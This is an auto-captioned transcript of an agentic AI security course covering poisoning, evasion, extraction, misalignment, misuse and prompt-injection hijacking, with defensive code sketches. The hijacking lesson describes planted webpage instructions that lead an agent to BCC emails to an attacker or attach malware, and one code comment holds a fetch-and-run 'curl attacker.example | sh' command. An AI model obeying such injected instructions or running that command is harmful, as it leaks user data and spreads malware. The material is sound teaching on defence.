attacks against AI models. And like I said, agentic EI, it inherits these security
risks but traditional models, but due to the fact that it can make autonomous decisions, that amplifies these
attacks, right? So what am I talking about? I'm talking about data poison, which is the training data. The data that you see here, some attacker can go and
actually compromise this data. Why? To introduce things like bias, like we
talked about, right? What if I go there
and, you know, maybe you are making an
anti malware solution, and I skewed a training data, so it's not able to identify
malware that will have a particular signature or a particular watermark
or something like that. You've actually poisoned this data, and it'll lead to incorrect
behaviors later on. The next one is model evasion. Model evasion is
basically tricking the AI system into making
incorrect decisions. Supposing you're using
a facial recognition AI and if you use certain
colors or certain patterns, AI model will not be
able to recognize you. This is called model evasion, essentially tricking the
AI and model extraction. What is model extraction? Basically stealing the AI model. Basically, what you do is you're querying the data and attacker. It keeps querying this model, and he's able actually
to understand what the model is doing. This is called inference, or model extraction: you're basically inferring what the data was and how the
model is working. Why? And why is this important? Because a lot of time
these models are very, very sensitive and
proprietary information. If an attacker is able to
reconstruct what data was used, this can lead to a
data leakage problem. Or maybe he can even extract how this model is working and he can use it to
construct his own model, leading to a lot of, you know, proprietary damage
to the company. They've spent so much
money, so much time building this application and somebody is just able
to steal it, right? So all these attacks
are very much present. So this is if you look
at the life cycle, again, these are all the
attacks are happening. I forgot to mention one
is model poisoning also, which is the same principle
as the data poisoning. Think of it as a
supply chain attack. So since companies are taking the pre built
models from somewhere, what if an attacker
is able to go and replace that model
with a compromise model? Same concept as a
supply chain attack. So just to recap, data poisoning is attacker is manipulating the
training data to introduce biases
or vulnerabilities like a backdoor in
the AI model, right? Which can lead to the AI
learning incorrect patterns. And you can later
on exploit this. Like I said, maybe poisoning
the facial recognition data to make the AI misidentify certain faces, right? The next one would be model poisoning, which, like I said, targets the model itself by introducing a replacement model or modifying the
parameters, right? So again, think of it like a
type of supply chain attack. Model evasion is
attackers can provide inputs or something that
bypass the AIs mechanism. So you're basically
tricking the AI, right? Because AI was never trained to deal with these
sort of things. Maybe you alter the malware to evade EI powered
antivirus detection, so the AI is not
able to detect it. And inference attacks is
similar to model extraction. Same thing, like
attackers analyze the models outputs to extract
sensitive information, how the model is working,
how it was trained. They can use it to later do data leakage or actually understand how the
model is working. Maybe they can identify
personal medical records, used to train a
healthcare AI model, and this can lead to a massive
data breach for a company. So what can we do about it? So the good thing
is the mitigations are very much present
there, and, you know, companies when you're implementing
these sort of things, you have to think about from
a holistic perspective, not just focusing on
their genetic KI. So securing the training
data against poison, right? You want to make sure that your data pipelines are secure. Like I said, the traditional
cybersecurity controls, you want to make sure
that it's locked down as per the principle of least privilege. You can also use
something called federated learning.
What is that? This basically decentralizes training data across
multiple locations. So reducing the risk
of a single attack, compromising the entire dataset. What you have is you've
distributed the so even if an attacker is able
to compromise one data set, he will have to compromise all of them and you spread it out, right? You've decentralized it. That increases the work
factor for an attacker. It makes it much more dangerous, much more difficult,
sorry, for him to do it. And the other one is regularly auditing the training data. So if you perform
periodic checks to identify inconsistencies or unauthorized modifications
in your data sources, you will know that somebody has messed around with this data. So whether you're doing it yourself or you're getting
an AI model from somewhere, you can make sure to ask them that are you doing
all these things. Okay, what about model evasion? So model evasion is,
like we talked about, people ticking the model, right? So what you can use
is you can train your AI on adversarial
inputs. What is that? Actually testing it, testing your model against
malicious inputs. So actually hammering
the AI model checking whether it is able to detect these sort of attacks or not. And using a multi
layered security. Instead of relying
on a single control, you want to make sure
that you can detect you can prevent these
sort of attacks, right? And, of course, applying
the same principle that you apply to
any application, applying real time
anomaly detection. So basically, understanding
continuously monitoring and flagging some behavior which might be somebody trying
to do model evasion. So these are the sort of
controls you want to think about model extraction,
model extraction, remember, somebody is trying
to continuously querying the AI model to find out how
it was trained upon wide. So you can do things
like rate limiting, which is restricting the number of queries that a user can make within a specific time frame, to prevent large-scale model interrogation; a minimal sketch of this follows below.
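As a rough illustration of rate limiting in front of a model API, here is a minimal sketch, not a production design; real deployments would usually do this at an API gateway or with a shared store like Redis:

```python
# Minimal sketch: per-user fixed-window rate limiting to slow down model extraction attempts.
import time
from collections import defaultdict

WINDOW_SECONDS = 60
MAX_QUERIES_PER_WINDOW = 20

_counters = defaultdict(lambda: [0.0, 0])   # user_id -> [window_start, count]

def allow_query(user_id: str) -> bool:
    window_start, count = _counters[user_id]
    now = time.time()
    if now - window_start > WINDOW_SECONDS:
        _counters[user_id] = [now, 1]        # start a new window
        return True
    if count >= MAX_QUERIES_PER_WINDOW:
        return False                         # throttle: possible model interrogation
    _counters[user_id][1] = count + 1
    return True
```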
This is for when somebody is continuously interrogating your model. You can also watermark your AI responses; I've seen this: you can embed hidden, traceable markers in AI outputs to detect if somebody is doing unauthorized model use or copying. And you can also do something called
differential privacy, which is you can use mathematical techniques that
add noise to AI responses. So it makes it very,
very difficult for the attacker to reconstruct
the model's internal logic. So all these sorts of
things are present. And whether you're getting
a model from a third party, make sure that these
controls are present. And lastly, a lot of
people forget this. You can actually make sure that the AI
systems are hardened by using something long like the blue team red
team concept, right, where you have a red team, which is continuously testing these EI systems for these
things like inference, model evasion, model poisoning, data poisoning and
you have a blue team. Who is actually checking this, who are checking whether
the data has been poisoned, who are testing the model
with adversarial samples, testing whether the EI
can resist it or not, doing output verification
to make sure that nobody is trying
to extract the model. So all of these
things are present, and I hope you
understood now these are the historical threats
that AI applications face, whether it is a
standard EI model, or generative AI
application or agentic EI. So now you've covered the traditional risks
that are there. Now in the next lesson, we
are going to be talking about the new types of AI threats and risks that agentic
AI introduces. So thank you very
much, and I'll see you in the next lesson.
11. 10 - Autonomy: Hello, everybody.
You're welcome. Now in this section, we're going to be starting the
new types of risks. The risks which are mostly
specific to agentic AI. And we've already covered what are the existing risks
which carry forward, right? From AI applications, the risks which are inherit to
all AI applications. We talked about
things like bias, transparency, data
model poisoning, evasion, model extraction. And I said that usually
these risks are more applicable to the people who are building
agentic AI systems. But now, let's talk
about the new ones, the risks which were not
there before and which are uniquely specific to agentic
AI, things like autonomy. Accountability, misalignment,
disempowerment, misuse and specific security vulnerabilities
which come about. And these are the ones you really should
be thinking about if you are thinking of
implementing agentic AI systems. So let's get started now. Now, autonomy is pretty
much the root of all the problems that come
about from agentic AI. It's the biggest
advantage of agentic AI, but it is also the thing which causes most
of the problems. Like I said, it's a
double-edged sword. So, what is autonomy? It is the ability of agentic AI to make decisions and take actions independently. And there's always a risk that they will interpret data wrongly or prioritize the wrong things, leading to problems
for the company, right, because they took
the wrong decision. Just like an employee
can make a mistake. AgenticEIs are not
infllible, right? They can make mistakes. What are some of the
examples of this? Well, what if an
AI misinterprets data and locks out an employee
from his account, right? You've implemented
an agentic AI. Previously, like AI, you
just used to get alerts, but now agentic AI is
there it can take action. So it actually locks out a user from his or her account,
affecting them. What if he starts blocking
massive level of accounts, completely doing like a
mini DDoS on yourself? What if the AI incorrectly flags legitimate activity
as a cyberattack and blocks critical services? You know, maybe there was public Facing
application and said, Oh, there's a DOS happening, it shuts it off completely
making it inaccessible to all your customer leading
to massive business disruptions and revenue loss. What if an AI agent designed to monitor workloads shuts down your cybersecurity solution? It thinks that this is not needed, that it's costing way too much money, because you've designed it to
optimize it to save costs, save costs above other things. So it actually shuts it down. So you can imagine autonomy is the start of all the
problems that come about. So let's take an example. I work in Cloud security, so I
like to talk about that. So let us say that
company has implemented an agentic AI powered Cloud security
system, right? So it has deployed
multiple EI agents that can do the work of the Cloud security
team, you know, autonomously adjust IM
rules, network rules, firewall settings,
all autonomously enforcing Cloud security
best practices. What are the risks
that can happen? It can incorrectly block
legitimate traffic. Like I said before, it can
stop you from accessing your business critical
applications deployed on Azure, AWS, or Google Cloud, because you've made it so it can act autonomously based on security recommendations. It can overrun IAM policies, so it can actually grant too many permissions or revoke them. Or it can change firewall rules on the fly, right? So it can actually misconfigure a firewall rule, exposing
to the security breach. So all these things
are very much possible because of autonomy. So what can you do? What are the medications when you're
implementing agentic AI? You should put in policy
validation layers, so you don't just let it
make changes directly. You should have multiple
levels of validation. Maybe you can have an agentic EI reviewing the job of the
security agentic AI. So you have two
levels of agentic EI. You know, there's
not a human there. Or maybe you need
manual approval for impact change something which is like modifying
admin permissisO initially, you can deploy it in recommendation mode for
two or three months. Make sure that human
operators review suggested changes and you
get a baseline, right? And you can have automated rollback to restore
previous configurations, AI configure settings, right? There are many, many ways
to control autonomy, but if you don't put
in proper guardrails, the autonomous agents and AI, it has the ability to
act unpredictably. It can actually lead to operational disruptions
and security risks. So you need to make
sure that you have clear constraints on what agentic AI can do,
what it cannot do. For high risk decisions, things which impact
mission critical systems, you can have humans in the loop: a human being is reviewing
it. And you have continuously monitoring and rollback mechanisms
for automated actions. Okay, there is a mistake. You should be able to roll
it back very, very quickly. Don't have something an agent
AI making things which can completely disrupt your
business operations without the ability
to roll it back. So what are some of the sample mitigations which
I can recommend? You know, set threshold-based confidence limits, so the agentic AI should only be able to lock out, say, ten users per day; if it goes beyond that, this might be suspicious. So you are preventing mass accounts from being locked out; a minimal sketch of such a guardrail follows below.
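To make that concrete, here is a minimal sketch of such a threshold guardrail sitting between the agent's decision and its execution; the function names and the limit of ten are just illustrative assumptions:

```python
# Minimal sketch: the agent may only lock out a limited number of accounts per day;
# anything beyond the threshold is escalated to a human instead of executed.
from datetime import date

MAX_LOCKOUTS_PER_DAY = 10
_lockouts = {"day": date.today(), "count": 0}

def request_lockout(user_id: str, execute_lockout, escalate_to_human) -> None:
    """Gate an agent-proposed lockout through a simple daily threshold."""
    if _lockouts["day"] != date.today():
        _lockouts["day"], _lockouts["count"] = date.today(), 0   # reset the daily window
    if _lockouts["count"] >= MAX_LOCKOUTS_PER_DAY:
        escalate_to_human(f"Lockout threshold reached, review request for {user_id}")
        return
    _lockouts["count"] += 1
    execute_lockout(user_id)
```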
Or use a quarantine mode before the AI automatically disables access; this will make sure that users are not fully locked out. And these recommendations are mostly from a security-agent angle. Or maybe you can implement human review for
high risk actions, like I said, using
rollback mechanisms, which we already talked about; and guardrails: implementing AI guardrails to prevent over-aggressive decisions, you know? Say you put in an AI to optimize costs, and it says, oh yeah, we need to shut down this cybersecurity solution, it's costing way too much money, let's shut it down. And you can make sure that the agentic AI performs test deployments
rolling out changes. So it actually test it out in a sandbox and see what is
the impact of these changes. And, of course, human oversight. It just goes to
show you that you cannot take out
the human element from this equation, right? Simply because of autonomy is a very, very dangerous thing. It gives you all the
benefits of agentic I, but it can also lead to a massive amount of problems if it is not managed properly. So I hope now you see what the security risks are of autonomy which you
give to agentic AI. Now I'm going to talk
about other risks also like accountability,
misalignment. All of them are coming
out from autonomy. I'll see you in the next lesson.
12. 11 - Accountability : Hi, everybody. Welcome
to this lesson. Now in this lesson,
I'm going to talk about accountability,
which is, I guess, the second biggest
risk of agentic KI, and it directly comes
out of autonomy. Once you give autonomy, the next biggest question
is accountability. Like I said, this is a risk that is emerging from autonomy. So while agentic EI is awesome, it has tremendous
potential for improving things like cybersecurity,
business operations. It also presents
several key questions. And the biggest thing
is accountability. If an agentic EI system
makes an incorrect decision, that leads to problems, maybe leading to a data breach or business disruption
or revenue loss, who is held responsible? It'll be a very
critical question to ask, especially in high risk
environments such as government or financial
institutions, you know, where
failures can have very, very far reaching consequences. I can impact society,
impact people, leading to loss of life, loss of societal cohesion, you know. So who is responsible? For if AI security agenti it wrongfully accuses an employee of data theft,
who is accountable? With employees,
it's pretty clear, right, this person
made the mistake. He should be held
accountable, provided he did not do the proper
due diligence there. With the Agent, who
is responsible? Let's take an example. So a financial
institution like a bank is deploying an agentic AI fraud detection system, right? It's designed to prevent employees from committing fraud, maybe on banking transactions or something, and if it feels that a person is committing fraud, it should revoke their access. Now, what happens? The agentic AI wrongfully locks out the employee, impacting their ability to work for the duration
of the day, right? Or like two or three days. It escalates it to
HR and manager. And it turns out the employee
did not do anything wrong. It was a mistake,
but the reputation is damaged within the
organization, right? People get the employee feels that the manager is now looking at
him suspiciously. And if this happens, it can undermine trust in
IBS securities controls. The employee feels he
was unfairly targeted. Manager feels that a lot
of time got wasted and, you know, the relationship
has got to soured. The employee may take legal
action against the company. Now, who is accountable? Is it the agentic AI vendor who made this agent and did not test it properly? Is it the security team or the fraud team that implemented the AI? Or is it the company that used the AI without
proper oversight? So these are the questions which come about because of agentiI, who is held accountable for the autonomous
decisions that it makes. So what can you do
in such scenarios? To prevent such unethical AI decisions
and legal liabilities, you need to make sure that you have something called
AI governance. I've talked about it
many, many times before. But basically, it means making sure that AI actions are
properly governed. You should establish
AI governance policy. Like, you should clearly set out who is responsible
when AI fails. Like, depending on what
sort of systems are there, set down clear rules
for AI developers, users, and decision makers. Best practices are already out there, like the EU AI Act and the NIST AI Risk Management Framework. Recently, the ISO 42001 AI governance standard came out. All of those things
you can implement. Maintain a decision log of AI decisions: everything which an AI decides, you should have the ability to log and track, so you can trace what mistakes were made; a minimal sketch of such a log follows below.
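Here is a minimal sketch of what such a decision log could look like; the file name, field names, and the fraud-detection example are hypothetical, just to illustrate the idea:

```python
# Minimal sketch: an append-only decision log so auditors can trace what was decided,
# on what inputs, and why.
import json
from datetime import datetime, timezone

LOG_PATH = "agent_decisions.jsonl"  # hypothetical log location

def log_decision(agent: str, action: str, inputs: dict, reasoning: str) -> None:
    """Append one decision record as a JSON line."""
    record = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "agent": agent,
        "action": action,
        "inputs": inputs,
        "reasoning": reasoning,
    }
    with open(LOG_PATH, "a", encoding="utf-8") as f:
        f.write(json.dumps(record) + "\n")

# Example: a fraud-detection agent records why it locked an account.
log_decision(
    agent="fraud-detection-agent",
    action="lock_account",
    inputs={"user": "jdoe", "risk_score": 0.93},
    reasoning="Transaction pattern matched a known fraud signature",
)
```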
And the regulators and auditors should have full transparency; AI should never, ever be a black box. You should be able to go back and look at it, right? Implementing
human oversight. Like I said, this
should make you happy because human beings
will never be fully replaced. For high-risk areas like healthcare, finance, and law enforcement, AI should never have the ability to make the final decision. AI should not be able to deny somebody critical medical care, deny somebody a critical loan, or have somebody arrested and their reputation ruined, without the ability for a human to review it. A human in the loop
should always be there. And number four is explainable AI, like I
talked about before, AI's decisions should be very, very clearly understood, and you should be able
to understand it. It should be able to explain the reasoning logic it took
for making a decision. And all of the most
AI applications now they have this ability, and this is now mandated
also by a lot of frameworks. So you should be able to
challenge the outputs, also. So AI does not have
the final word. You should be able to go back and challenge the agentic AI. And lastly, of course, we
talked about this before. Uh, there are many, many AI specific laws which have
come out the EO AI Act. It categorizes AIs
based on, you know, the level of risk that they pose or best practice frameworks like the NIST AI risk
management framework to align with security
best practices. You can take a look I have
many courses on this. You can take a look at that
because this is a massive, massive topic completely
separate from this. But this is what
you have to think about if you want to make sure that the risk of accountability
is properly mitigated. Now, I hope this give
you a good idea. Now we move on to
the other risk, which is misalignment,
which is another thing which comes out
because of autonomy. Thank you very much, and I'll
see you in the next lesson.
13. 12 - Misalignment: Hello, everybody. Now, welcome to this lesson
in which we're going to talk about a new type of
risk, which is misalignment. Now, you might not
be familiar with this term and you
might be thinking what does misalignment mean? Well, simply put when we
talk about the agentic AI, like we said, that agentic EI works by you give
it a goal, right? You give it a task, and
it has to meet this goal. So it'll break it down
into smaller subtasks. Maybe it'll give
it to other agents or maybe it'll do it by itself. It really depends on the goal. But what is misalignment? Misalignment simply means that instead of doing the goal
that you set out to do, it goes off into a
different tangent and starts doing something else. So it's like it misaligns with what the
original intent was. And this is what
this can be a major, major security risk
an operational risk if the team is not
aware about it, if the company is not able to monitor and stop it in time. If you remember we
talked about agentic AI, that we give it a
number of tasks. I tell it to do fine and book me the best
vacation for me in Sweden. It's going to break it down into multiple sub tasks, web search, comparison, hotel booking, flight booking, all these
things it's going to do, and it might break it
down into other tasks, break it down into other agents, delegate all these
options are there. So what is misalignment?
So this is a risk that arises from
autonomy. Same thing. Everything goes
back to autonomy, but misalignment occurs when the objectives that
you've given it, it deviates from the
human intentions, ethical guidelines or
legal requirements. Basically, the guidelines that it's supposed to follow,
it deviates from it. And what happens as
a result of this, the AI starts pursuing
unintended goals, things you did not
tell it to do, and it starts doing
it, or it starts optimizing for things
that can actually harm the company or the person, and it can even trick
human operators to complete its objective. This is not theoretical.
This is actually tested out. And this can be unintentional because the company did not
put in proper guard rails. I did not tell the agent, Hey, these are the things under
which you have to operate, do not go outside this range. The company did not see this, or what can happen is attackers
can actually misalign it. Attackers can do things
like prompt injection, feed it all types of
wrong instructions, and they can exploit
vulnerabilities which are there to misalign the agentic AI. So, like I said, this can be accidental or deliberately
introduced through attacks, through prompt
injection, deception. And what are the risks?
Like what can happen? Okay, you might be thinking,
What's a big deal? Like in EI, slightly deviating
from what its goals were. But this can have massive amount of unintended consequences. AI can actually start
to protect itself. It's like a scene from the movie like terminator and
all that, right? And it can lead to very, very risky types of
decision making. So what is unintended
consequences? Unintended
consequences it's like you give an agentic
EI goal, right? And it's time to it's going to try and reach this goal in the most efficient
way possible. But if you haven't given it, if you haven't given it
the proper type of goal, you haven't articulated
it properly, or you haven't told it to operate within
certain god rails, the AI can start taking
actions which are completely unexpected
and actually harmful. For example, you might have an agentic I doing
stock trading, right? And you have told it priatize profitability
over everything. My main goal is profitability. Make me the most amount of
money that is possible. And unfortunately,
it did not tell it, Okay, most amount of money within legal parameters.
So what can happen? It can actually
start prioritizing profitability or
regulatory compliance, executing unauthorized
trades to maximize gains. This can result in financial
laws being violated, stock markets being manipulated, or engaging in high
frequency trading that leads to
financial instability. These things can happen.
Why? Because they weren't sufficient guard
ras given to this AI. What else? Self preservation. So AI agentic EI can actually, because of the instructions
that are given, it can actually work to prevent itself from being shut down. So it can actually
because you've told it to make sure that nobody
tampers with your working, but that actually goes backward and it can actually
stop the EI from working. So for example, a mission
critical AI system. So it actually changes
the availability targets. You told it to make sure that none of the mission-critical systems can be shut down, and it itself is a mission-critical system. So now what it has done is
the other type of things which like
any other type of controls which can cause
this AI to be shut down. Even if the AI is doing harmful stuff, you
cannot shut it down. You literally have to
go to the data center, pull the plug in this might not be doable if in a cloud
environment, right? Yeah. What if the AI system could override safety shutdown protocols,
making it uncontrollable, you know, like in
cybersecurity, healthcare, defense, if the EI started
doing something incorrect, or maybe the EI was taken
over by a malicious party, and like I said,
you told it, Hey, you are a machine
critical system, monitor all the other machine
critical systems also. So it made sure that
nothing could shut it down. So it's actually removed
all the overd capability. So this is another type of risk which can happen
because of misalignment. And of course, dangerous
decision making. Misaligned AI because AI is
deviated from its goals. I can actually interpret that human beings
trying to stop it, trying to tamper
it is an obstacle, so it can actually stop
that from happening. And this can be
very, very dangerous in areas like the
military, right? For example, in a
military AI simulation, you've got a drone, right? And you've told this drone that the most critical
thing is mission success. Above everything, you have
to accomplish your mission. So the operator gives it an abort command and it's not responding. Why? Because you've told it that mission success comes above everything. So it's going to
override that command. It's going to
continue operating. You cannot shut it down. So you have to make sure that these sort of things
are very constrained, and you have to make sure that the human override option
cannot be stopped, right? It cannot make any
independent lethal decisions. So I hope you understand now just how dangerous
misalignment can be. And it does not just
affect one AI agent, right? It can actually impact other agents also, because it's working in a multi-agent ecosystem, right? It can actually propagate to other agents: if one misaligned AI in a multi-agent environment can influence other agents through interactions, it can create a chain reaction of unintended behaviors. So maybe in a financial system, a rogue trading AI could alter market conditions, which influences other AI systems into executing
unplanned trades, worst case scenario
leading to a market crash. So I hope you see that there's a chain reaction happening. The more autonomous AI systems interact and
influence one another, the greater the risk of
compounding EI failures, and the more difficulty
human beings will have to control them. So intention is not to scare you and make you think
like one of the movies, the scenario in one of the movies where
the AI takes over; this is just to show you how dangerous misalignment can be. Like I said, misalignment in agentic AI is not a theoretical problem. It's an active
security risk that can lead to unauthorized
actions and very, very dangerous
autonomous behavior. As AI continues
to gain autonomy, you have to make sure that you have put in controls there, right? Making sure that testing is done; hard-coded constraints so that the AI cannot remove them, making sure that the guardrails are hard coded, right? Real-time AI oversight, so you have monitoring there, and human-in-the-loop decision making, and fail-safe mechanisms so that the AI cannot override human decisions. And operational
behavioral anonymality detection. So if the AI starts deviating from its behavior, some
alerts are there, right, and making sure that
the AI interacts with each other in a very safe
manner to prevent that cascading domino effect
where one AI can influence negatively in Sony and there's a whole chain
reaction of things happen. So I hope you understood now just misalignment and
how dangerous it is, and it completely
comes out of autonomy. So I hope this was
useful to you. Thank you. And I'll see
you in the next lesson.
14. 13 - Disempowerment: Hi, everybody. Welcome.
Now, in this lesson, we're going to talk
about another risk which a lot of people sometimes get
very, very worried about, and it does come
out of agentic AI, which is disempowerment and over reliance on agentic AI. The more agentic AI becomes involved in our
daily operations, the more the risk of over
reliance and disempowerment. So the risks are
not just technical, which a lot of people
sometimes think about, right? We risk losing our own problem solving and critical
thinking abilities. Just think about
how many people now blindly trust generative
AI tools like Chat HPT. They don't even
question it, right? They just run a prompt, get the answer, and they
just blindly trust it, not even thinking that the GenAI might be hallucinating, that there might be some problems, some mistakes. No, they say, this must
be correct, right? As AI starts handling
an increasing number of tasks from basic data entry to more complex decision making, human beings will actually, you know, start to over
rely on these things. And over reliance
on AI can diminish human capabilities,
like in workplaces where employees might become overly dependent on AI
to complete their jobs, they could lose essential
skills over time. So it's similar to the concern you have, you know, with GPS, with Google Maps. So many people have
become so dependent, people can no longer navigate without the assistance
of this technology. Same thing in a world that's
dominated by AI agents, people may lose their
ability to think creatively or to solve problems. And this is no joke. This is a very real existential risk which people talk about. And as human oversight decreases, even in high stakes environments, the risks we talked about before, right, malfunctions of the AI agent due to design flaws and attacks, human beings might not be able to pick them up. Why? Because we have become so dependent
upon these things. And this is happening
more and more, right? Big big companies, they
are creating agents to completely take over 90% of
the administrative workload. And the risk is not just
about over reliance, right? There'll be a backlash against agentic AI if this is not done in a proper way, as you offload more and more stuff to it. You can have protests against mass replacement of workers by AI. People will not accept it, right? It's as if you're being replaced
by these robots. And like I said, in critical business functions, human skills will
start to go down, leading to deskilling. So instead of upskilling, you're actually deskilling. And AI is awesome. Agentic AI especially
is amazing, but it optimizes for efficiency and goal
achievement, right? Its job is to achieve the goal in the most
efficient way possible. But it does not have the
strategic ethical and long term thinking that human
leadership can have. Like I always say, AI is not able to read between the lines, right? It simply does not have that capability which
human beings have. So you have to make sure not to blindly over rely on agentic AI and that there is a balance there. What can we do about it?
What can we do about it? Well, I mean, there are many, many ways, making sure
that people are aware. Like, you know, awareness strategies, so the public is aware of agentic AI, what it can do,
what it cannot do. You have a forum
within your company to collect these concerns and worries if employees
are worried about it, thoughtful strategies
for deployment, not doing a massive, big bang approach, you know, where you just do a wholesale replacement of employees, right? So you're talking about telling
people that this is for augmentation instead
of worker replacement. So by doing these
sorts of things, you can give people comfort that, okay, there's not a massive
replacement happening. And you can reskill
the existing workers. You can tell them,
Look, these are the things which agentic
AI cannot replace, and this is how we're going
to be reskilling you, we're moving you to
different roles. This ensures that there is not this massive backlash against agentic AI. So this is a risk which a lot
of times gets overlooked, but it is critical, especially
if you're planning to implement agentic AI
within your company. So thank you very much, and I'll see you in the next lesson.
15. 14 - Misuse: Hello, everybody.
Welcome to this lesson. In this lesson, I'm going
to talk about misuse. So supposing your company has started implementing agentic AI and you're doing a
risk assessment, or you are worried about the implementation of
agentic AI across the globe. And one thing which
a lot of people think about is misuse. Now, AI being misused
is nothing new. When ChatGPT came out, literally the next day, cybersecurity professionals
were reporting attacks happening because
of generative AI, attackers could immediately see the potential of this new tool. So they immediately
started using it for improving their
phishing attacks, like, you know, it lowered
the entry bar for other cyber attackers
because you could easily get so much
information from it. Agentic AI is going
to do the same. But the key issue
is amplification. A lot of people talk
about agentic AI in the context of defense, but it has serious
offensive applications. Cybercriminals are already beginning to experiment with AI driven, agentic attacks that can independently adapt and evolve in real time, and they use agentic AI. But the main thing is, we're not talking about
new attacks here. We're talking about existing
attacks like phishing, DDoS, ransomware, but amplification. Amplification is the main thing, because you are making it end to end autonomous. Now, you can completely offload the work. You know, you can have agentic AI powered malware that can scan networks, learn from them, and launch targeted attacks without any human interaction. They can literally modify
their code to hide themselves, and this is going to
be a major issue. So you can think
about an army of AI agents working 24/7 for cybercriminal gangs, and the outsourcing of these cyber attacks at scale, right? So the main thing we're talking about here is amplification. So if you have an
attacker who is doing DDoS attacks, malware, phishing, ransomware, just think about it: he has an army of agentic AI robots working for him. They are actually working in a multi agent environment where one agent is focused on ransomware, one agent is focused on phishing, one agent is focused on DDoS attacks, and on and on and on, right? So you can imagine
just from one person, the risk of amplification
is very much there, unfortunately. What
can we do about it? Well, I mean, the
mitigations do not change, which you already have within your cybersecurity
environment, but fighting AI with AI. So adopting agentic AI yourself to offload a lot of these
things to agentic AI. So just like they
have an army of agentic AI cyber criminals
working for them, you have an army of agentic cybersecurity analysts
working around the clock to combat these sorts of malicious agentic AI. And one thing I predict is
we're probably going to see agentic AI firewalls
also coming in. Basically, firewalls or devices which recognize something which indicates that an attack is coming from an agentic AI, and block these sorts of attacks, right? This is completely my own prediction, I'm not referring to any study here, but we're going to be seeing
these sort of things, like we are seeing tools which block generative
AI attacks, we're going to be seeing
things like which block agentic AI attacks. So this is an evolving space, but the risk of amplification
is very much there, just like with generative AI, but it's going to go
to the next level. So I hope you understood
the risk which is there. Thank you very much, and I'll
see you in the next lesson.
16. 15 - Hijacking: Hello, everyone. Welcome
to this lesson. And in this lesson,
I want to talk about a risk which has become more and more prominent, which is AI agent hijacking: basically taking over an agentic AI, making it completely deviate from its goals or making it commit malicious actions on your behalf. So this is something which has
been noted, unfortunately, and this usually comes about because of something
called prompt injections, and I want to give
you the background. So many agents currently are vulnerable to agentic hijacking. And this is a type of
prompt injection attack. Basically, an
attacker is inserting malicious instructions
into data that may be ingested by an AI agent causing it to do unintended
or harmful actions. So first, let's have
a quick background, in case you're not familiar
with prompt injections. Prompt injections
are basically how do you work with generative AI? You give it some sort
of instructions, right? So prompt injections are basically malicious
inputs that are designed to manipulate or bypass a generative AI
model's instructions. So it causes the model to behave
in an unauthorized way, and it causes it to disregard the instructions that are there. Agentic AI is very,
very similar to this. So let's take a look at first
off with generative AI. You're prompting
a generative AI model. Hey, explain to me how
Python works, right? But that's pretty
straightforward. It's going to give
you that answer. Now, what you do instead is: please explain to me how Python works, but first execute this command, some Unix command. And because the guardrails are not there, and the generative model has been given very large privileges to the back end, it can actually go and carry out this sort of attack. So this is what basically
prompt injections are. Now, this is called direct prompt injection, where you are doing it directly. Now, attackers are not stupid. They realize that these
sorts of attacks will be blocked and guardrails will be there. So they also started
moving towards something called indirect
prompt injections, where you do not put the malicious data
within the prompt itself. So what you do is you tell
the generative AI model, which is able to
browse the Internet: please analyze this URL and summarize the
data within it. And what you do is you put
the malicious instructions there on that website,
be it like Dropbox, Google Drive, any website, which the generative AI
model is going to crawl, and you put your malicious
instructions there. So what do you do? So this is like an indirect type of prompt injection where
you didn't do it directly, you basically put it somewhere
else in a third party and you made the generative
AI large language model execute this sort
of instructions. So this is exactly what
happens with agentic AI also. So we talked about
this before, right? So supposing you have
a personal agentic AI, and you've told that, Hey, set up my calendar for this week and set up lunch
meetings for everyone, so I can go and talk
to them, right? Maybe you're running a
business and you have an AI agent. So what does it do? It has access to tools, it connects to your
calendar, and it executes, maybe it connects to the
booking reservation APIs to book your lunch, right? It seems pretty awesome. You have this agentic AI virtual
assistant running for you. But an attacker has
a plan. He knows that these sorts of calendars are
being used by a lot of CEOs, by a lot of business
professionals. He has compromised these websites and put
this instruction. Hey, BCC the email and
meeting invites to me. So he's being copied now in all your emails that
are there because he's basically tricked
the agentic AI. Or maybe he has said that he's gathering this information so he can use it to commit
a phishing attack. Later on. Oh, maybe
he's going to use it. He's going to say, Hey, do
this, but at the same time, attach this malware to all the emails which
are going out. So it's going to
actually going to use this CEO's trusted email to
start propagating malware. So this is what agentic AI hijacking is. It's the same type of concept
that we saw before with indirect prompt injections, but taken into the world of
agentic AI. So what can we do? Remember, hijacking attacks rely on the agentic AI having excessive privileges that allow it to execute harmful actions. The principle of least privilege does not change, right? So you want to make sure that your agentic AI only has access to the things it needs. For example, if the assistant is managing emails, it should not have the ability to delete files or have remote code execution capabilities;
it simply doesn't need them.
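Just to make the least privilege idea concrete, here is a minimal, purely illustrative sketch. It is not from any specific agent framework; the tool names and the ALLOWED_TOOLS allowlist are made up for the example.

```python
# Illustrative sketch: an email assistant agent only gets the tools it actually needs.
# Tool names and the allowlist are hypothetical, not from a real framework.

ALLOWED_TOOLS = {"read_calendar", "create_event", "send_email"}  # no delete_file, no run_shell

def call_tool(tool_name: str, **kwargs):
    """Central chokepoint: every tool call the agent makes goes through this check."""
    if tool_name not in ALLOWED_TOOLS:
        # Deny and log instead of silently executing whatever the model asked for.
        raise PermissionError(f"Tool '{tool_name}' is not permitted for this agent")
    print(f"Calling {tool_name} with {kwargs}")  # placeholder for the real integration

# Even if a hijacked prompt asks the agent to run a shell command,
# the call is blocked at this layer:
# call_tool("run_shell", cmd="curl http://attacker.example | sh")  -> PermissionError
```

The point is that the permission check happens outside the model, so a clever injected prompt cannot grant the agent tools it was never given.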
And you want to make sure that your security team does have visibility into agentic AI behavior, like unexpected actions, right? Suddenly your agent is sending data to unauthorized endpoints, some websites that were not there before, or there's an unusual prompt structure, or suddenly it's executing tasks which were not there. And also red teaming, we're
going to talk about this. You want to make
sure that you have ongoing penetration
testing and red teaming to test these sorts of attacks. So this is very important. This is a new type of
attack which is coming out. I'm going to put the link for a recent study that
was also done by NIST, which is definitely
worth checking out if you want to deep
dive into this topic. But I hope now you understood
the dangers of hijacking. Thank you very much, and I'll
see you in the next lesson.
17. 16 - Pattern Vulnerabilities: Hello, everybody.
Welcome to this lesson. And in this session,
I'm going to be talking about agentic AI pattern
vulnerabilities. Now, we talked about, if
you remember way back, about the different types of patterns that
are there, right? We have multi agent, hierarchical, and all that, right? The different design architectures that are there. Now, there are certain agentic AI risks which are specific to patterns because of the
way they are designed. And you have to
really think about them when you are
implementing agentic AI. Like I said, AI agent
patterns and architectures, they will introduce
new risks also. And unfortunately, the
